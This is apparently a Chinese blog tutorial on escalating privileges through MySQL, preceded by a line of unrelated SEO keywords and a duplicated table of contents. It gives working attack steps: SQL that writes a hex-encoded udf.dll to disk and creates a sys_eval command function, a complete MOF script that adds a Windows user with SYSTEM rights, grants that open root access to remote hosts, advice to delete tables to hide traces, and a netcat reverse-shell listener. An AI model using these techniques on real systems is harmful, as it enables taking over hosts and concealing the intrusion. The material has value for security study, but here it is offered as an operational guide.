网站开发者模式下载视频,iis 子网站,小程序开发平台花多少钱,装饰公司网站模版目录 MySQL数据库提权简介
UDF提权
原理
利用条件
利用准备
利用过程
MOF提权
原理
利用条件
利用过程
自启动提权
反弹shell提权
总结 MySQL数据库提权简介
一般数据库提权思路#xff1a;
检测数据库的存在#xff08;探测端口#xff09;获取到数据库的权限…目录 MySQL数据库提权简介
UDF提权
原理
利用条件
利用准备
利用过程
MOF提权
原理
利用条件
利用过程
自启动提权
反弹shell提权
总结 MySQL数据库提权简介
一般数据库提权思路
检测数据库的存在探测端口获取到数据库的权限密码查看数据库的类型分类
最主要的就是要获取到数据库的账号密码获取方式大概有
读取网站的配置文件读取数据库备份文件下的库中的表的信息例如MySQL数据库在mysql_user表中存储账户密码使用cmd5-mysql5解码暴力破解账户密码需要支持外联mysql默认不支持。可以使用密码脚本在本地爆破也可以使用工具如msf的scanner mysql_login模块
MySQL数据库提权方式主要有三种
使用sqlmap的--os-shell使用写入一句话木马union select 1一句话木马3 into outfile/dumpfile 文件路径udf提权mof提权启动项提权-反弹shell-exp提权 UDF提权
原理
MySQL内置函数不满足需要所以MySQL提供了添加新函数的机制自行添加的MySQL函数就称作UDFUser-Defined-Function。
用户可以自定义提权的函数比如执行系统命令函数来进行提权。 MySQL版本大于5.1版本udf.dll文件必须放置在MySQL安装目录下的lib\plugin文件夹下 MySQL版本小于5.1版本udf.dll文件在Window2003下放置在C:\Windows\System32下在Windows2000放置在C:\Winnt\System32 利用条件
获取到MySQL权限或者说获取到MySQL账号密码能够调用MySQL语句MySQL具有写入功能也就是secure_file_priv值不为具体值或者为固定某值可以用SQL语句查询 show global variables like secure%; 要有root权限且要允许外连。root账户允许外连的SQL语句 grant all PRIVILEGS on *.* to root192.168.15.249 identified by 112358; 利用准备
1、熟悉对方的MySQL目录结构和主机型号使用SQL命令查看
show variables like %compile%; 2、确定MySQL的目录结构搜索位置
show variables like %plugin%; #查找具体目录
select basedir; #查看MySQL目录
3、kali里面其实有自带的udf提权脚本并且有32位和64位的版本目录位置
/usr/share/metasploit-framework/data/exploits/mysql 利用过程
如果有文件上传漏洞可以使用蚁剑等工具连接之后然后直接将提权脚本文件放入lib\plugin目录下然后使用mysql终端创建自定义函数sys_eval create function sys_eval returns string soname udf.dall; 直接在mysql终端创建目录导入文件 create table temp(data longblob); #以二进制数据流容器longblob创建临时data表
insert into temp(data) values (unhex(udf文件的16进制格式)); #将udf.dll脚本的十六进制写入data表
select data from temp into dumpfile xxx\\xxx\\lib\\plugin\\udf.dll; #将udf文件导入到指定目录
create function sys_eval returns string soname udf.dll; #创建自定义函数sys_eval 调用脚本创建sys_eval函数 可以使用kali自带脚本也可以用msf进行提权
最后为了删除痕迹要把刚刚新建的data表删掉。 MOF提权
原理
类似于udf提权但成功率低简单总结来说就是替换原来文件然后利用自启动原理执行文件进行提权。
在Windows系统下存在一个mof文件路径C:/Windows/System32/wbem/mof/nullevt.mof它的特点为每隔极短一段时间便会以System权限自动运行文件内脚本mof提权就是利用这点将写好的mof文件导入该目录中让它自动执行代码。 利用条件
有mysql账号和密码目录可写入 利用过程
select load_file(mof文件路径) into dumpfile c:/windows/system32/wbem/mof/nullevt.mof#pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace “Root\\Cimv2”;
Name “filtP2”;
Query “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second 5”;
QueryLanguage “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name “consPCSV2”;
ScriptingEngine “JScript”;
ScriptText
“var WSH new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user secist 123 /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer $Consumer;
Filter $EventFilter;
};执行完毕替换net user hsy 123456 /add换为 net localgroup administrators hsy/add 即可将用户提升管理员权限 自启动提权
利用条件mysql开启外连知道账号密码
GRANT ALL PRIVILEGES ON *.* TO root% IDENTIFIED BY 密码 WITH GRANT OPTION;使用msf 搜索使用mysql start-up模块 设置目标IP 账号密码 还可以写入反弹shell接受IP 写入启动项 需要对方启动系统如果权限不够高可以尝试反弹shell能否获取更高权限 反弹shell提权
mysql创建反弹函数select backshell‘发送到的ip地址’,‘端口’kali使用nc监听本地攻击机IP nc -l本地-p 端口 总结
mysql提权有很多种方法有通过sqlmap的--os-shell、通过写入文件outfile/dumpfile、通过udf提权、通过mof提权、通过自启动提权等等mysql提权需要的三个条件要有能够执行数据库语句的权限知道数据库账号密码mysql数据库要有能够写入的权限secure_file_priv的值不为具体值或者为某个具体值为null表示禁止导入导出mysql账号要有root权限或者是有root权限的其他用户且要允许外连UDF提权原理是因为mysql提供自定义函数的功能所以可以自定义提权的函数例如命令执行等而udf.dll文件放在数据库目录下的lib/plugin下UDF提权利用方式可以通过蚁剑连接上传脚本后直接将udf.dll放置在目录下然后进行创建函数也可以通过mysql命令语句执行先创建表然后将文件内容的16进制传入表中然后再通过写入文件函数dumpfile写入指定目录最后再创建函数还可以利用脚本进行创建函数kali有自带的脚本也可以通过msf等的脚本利用工具。MOF提权相对于UDF提权相对利用率较低它是专门针对Windows提权的。原理是因为Windows下有一个mof文件路径在C:/Windows/system32/webm/mog/nullevt.mof下它特点是每隔一段时间系统就会以root权限去执行这个文件利用这一点就可以进行利用。
